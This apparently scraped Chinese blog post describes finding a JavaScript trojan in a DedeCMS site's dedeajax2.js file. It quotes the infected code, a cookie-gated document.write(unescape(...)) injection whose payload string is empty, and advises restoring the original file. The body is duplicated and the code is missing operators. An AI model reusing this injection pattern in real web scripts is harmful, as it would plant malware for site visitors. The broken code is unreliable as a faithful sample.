您现在的位置是:网站首页>建站学院织梦CMS
dedecms:dedeajax2.js被植入js木马
2021-07-16来源: 【织梦CMS】
人已围观
简介 这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下://初始化xmldomfunction InitXDom(){if(DedeXDOM
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
很赞哦! ()
猜您喜欢
相关文章
付费说明
1、安装cms后台,费用是200,基础费用200包括后台调试以及部分页面模板修改.
2、请加我个人微信 634626966,或者扫一扫微信二维码。备注“网站”
3、系统安装只限定于帝国cms,并且支持php,虚拟主机,请选择linux系统
4、【收费说明】制作企业网站,我是这么收费的!
空间购买
文章评论
点击排行
猜你喜欢
